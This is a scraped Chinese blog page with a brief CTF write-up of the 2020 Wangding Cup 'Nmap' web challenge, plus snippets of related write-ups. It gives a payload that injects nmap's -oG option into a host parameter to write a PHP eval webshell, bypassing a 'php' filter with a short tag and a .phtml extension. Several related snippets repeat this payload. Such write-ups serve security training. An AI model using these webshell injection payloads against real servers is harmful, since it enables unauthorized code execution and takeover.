[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2024-08-06 21:19:20 发布
最新推荐文章于 2024-08-06 21:19:20 发布
阅读量156 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113408897
版权
"本文介绍了如何在限制的环境下使用Nmap,通过修改payload技巧,如`?host='<?=@eval($_POST["cmd"]);?&gt;-oGyjh.phtml'`,实现对Web服务器的蚁剑连和命令执行。教程详细讲解了如何在PHP过滤下找到突破点,适用于技术渗透和安全测试。"
摘要由CSDN通过智能技术生成

[网鼎杯 2020 朱雀组]Nmap

考nmap的用法,但是我不会
用上次online tool的payload

?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php '

回显hacker
猜测是过滤了php

?host=' <?= @eval($_POST["cmd"]);?> -oG yjh.phtml '

在这里插入图片描述
这样可以蚁剑连,也可以post一个命令
在这里插入图片描述

https://www.bilibili.com/video/av795863875/

切谁怕谁
关注
专栏目录
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 772
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3066
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
[网鼎杯 2020 朱雀]Nmap1
最新发布
kw741951的博客
08-06 199
看到这里我们猜测,输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果。输入发现报错,但是没事,继续输入haha'得到flag。我们试着输入127.0.0.1 \| ls试一下。随便输入本地ip试一下127.0.0.1。输入127.0.0.1 | ls看一下。可以看到输入的|被转义字符\转义了。我们输入的东西必须绕过这两个函数。看样子是nmap扫描了。打开题目看到如下信息。
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 838
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
[网鼎杯 2020 朱雀]Nmap(详细解读版)
weixin_73399382的博客
07-27 1190
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
Nmap扫描实战命令汇总
啊渊的专栏
07-26 2567
Nmap实战详解
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1276
[网鼎杯 2020 朱雀]Nmap
2020/7/15 - [网鼎杯 2020 朱雀]Nmap - nmap写入webshell
抒情诗
07-15 657
这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。 本文思路1 127.0.0.1' <?=eval($_POST[a]);?> -oG 1.phtml
BUU-WEB-[网鼎杯 2020 朱雀]Nmap
qq_24033605的博客
05-13 227
[网鼎杯 2020 朱雀]Nmap 先查看主页的源码。 主要功能就是一个网页版的nmap。 //nmap参数: -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 通过测试,可以测试出是单引号闭合。 构建payload: ' <?php @eval($_POST[cmd]);?> -oG hack.phtml 回显: hacker 尝试使用短标签绕过。 ' <?= @eval($_POST[cmd]);?&
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3893
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
NO.2-24 [网鼎杯 2020 朱雀]Nmap
nigo134的博客
08-03 260
站老是崩,有点难受。过程 1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。 2. 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件选项-oG 将结果Grep保存。 nmap -F -oG test.txt 192.168.23.1 选项-oA 该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。 3.尝试对扫描结果进行指定..
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 871
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2463
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值